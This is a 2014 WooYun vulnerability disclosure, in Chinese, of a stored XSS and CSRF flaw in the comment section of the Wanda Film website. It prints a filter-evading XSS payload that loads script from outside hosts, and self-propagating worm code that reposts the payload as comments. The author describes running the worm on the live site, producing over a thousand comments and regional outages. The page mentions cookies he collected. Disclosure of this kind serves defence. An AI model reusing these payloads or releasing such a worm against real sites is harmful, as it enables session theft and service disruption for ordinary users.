当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073160

漏洞标题:万达电影主站 xss + csrf 又是蠕虫

相关厂商:大连万达集团股份有限公司

漏洞作者: 0x_Jin

提交时间:2014-08-20 13:45

修复时间:2014-10-04 13:46

公开时间:2014-10-04 13:46

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-20: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商已经确认,细节仅向厂商公开
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-10-04: 细节向公众公开

简要描述:

又是蠕虫,主站已出现区域性无法访问 我不是故意的。。。。我只是测试一下 赶快确认了把 我好把js给删了 你要是不确认我也不好删啊。。。。 真心说一声抱歉。。。

详细说明:

漏洞存在于 电影的评论处,要加载js过滤规则挺严的!
先上payload:<img src=x onerror=$['get\123cript']('//20.rs') width=0>
对script 做了检测 于是便用js8 对S做了下编码
然后成功加载js :

QQ20140820-1.png


再来看下xss平台上所收到的:

QQ20140820-2.png


由于万达功能比较少 为了证明漏洞影响。。。于是我。。。。
又玩了次蠕虫,上代码:
var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment";
var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code=";
if (window.XMLHttpRequest){
var xmlhttp1=new XMLHttpRequest();
}
else{
var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST",url,true);
xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
把filmId 的值替换成 想要蔓延过去的电影ID的值 就可以蔓延到另外一个电影。。。 为了减少影响范围 我只对20140507033232512405 20140707102851445844 这两部电影蠕了
来看看现在蠕了多少次了:

QQ20140820-3.png


现在在持续增长中,目前已出现区域性无法访问:

QQ20140820-4.png


漏洞地址在这里:
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140507033232512405.html
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140707102851445844.html
赶快确认吧 我好删除js!

漏洞证明:

漏洞存在于 电影的评论处,要加载js过滤规则挺严的!
先上payload:<img src=x onerror=$['get\123cript']('//20.rs') width=0>
对script 做了检测 于是便用js8 对S做了下编码
然后成功加载js :

QQ20140820-1.png


再来看下xss平台上所收到的:

QQ20140820-2.png


由于万达功能比较少 为了证明漏洞影响。。。于是我。。。。
又玩了次蠕虫,上代码:
var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment";
var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code=";
if (window.XMLHttpRequest){
var xmlhttp1=new XMLHttpRequest();
}
else{
var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST",url,true);
xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
把filmId 的值替换成 想要蔓延过去的电影ID的值 就可以蔓延到另外一个电影。。。 为了减少影响范围 我只对20140507033232512405 20140707102851445844 这两部电影蠕了
来看看现在蠕了多少次了:

QQ20140820-3.png


现在在持续增长中,目前已出现区域性无法访问:

QQ20140820-4.png


漏洞地址在这里:
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140507033232512405.html
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140707102851445844.html
赶快确认吧 我好删除js!

修复方案:

在你们现在的过滤基础上过滤的更加严格一点吧!

版权声明:转载请注明来源 0x_Jin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-08-20 13:49

厂商回复:

感谢0x_Jin同学的关注与贡献!立即通知业务修复此漏洞!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-20 13:47 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    水表保护好...

  2. 2014-08-20 13:48 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    @大连万达集团股份有限公司 我会一直刷新wooyun的 确认了 我立马删除 那些cookie什么的 也会删除的 求不查水表

  3. 2014-08-20 13:54 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    @大连万达集团股份有限公司 已删除几分钟了。。。 那些评论就麻烦你们处理了 一千多条呢 内容都一样的 批量删除就好了 。。。

  4. 2014-08-20 14:55 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    已报警

  5. 2014-08-20 15:24 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)

    楼主开门 查水表

  6. 2014-08-20 15:46 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    @铁蛋火车侠 你出现的挺频繁哈

  7. 2014-08-21 09:07 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    您好,您订的娃娃到了,请开门

  8. 2015-07-25 10:54 | 鬼见愁 ( 路人 | Rank:10 漏洞数:1 | 挖洞之神)

    你这个xsspayload不错 求更多的payload谢谢了